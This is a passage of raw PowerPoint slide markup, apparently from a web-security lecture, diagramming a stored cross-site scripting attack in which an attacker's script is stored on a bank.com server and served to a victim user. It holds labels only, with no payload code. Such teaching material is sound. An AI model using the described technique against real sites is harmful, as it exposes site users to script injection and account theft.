                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766509" y="2590165"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2872740"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092825" y="6449822"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216025" y="1539240"/>
            <a:ext cx="6849109" cy="1041439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4338320">
              <a:lnSpc>
                <a:spcPts val="2390"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618413" y="5400376"/>
            <a:ext cx="728345" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Title 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F983B134-2ACC-6D40-80E0-FD9CAE37F025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274638"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE399588-6C20-5C44-9DC9-B86514F562B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>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01625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
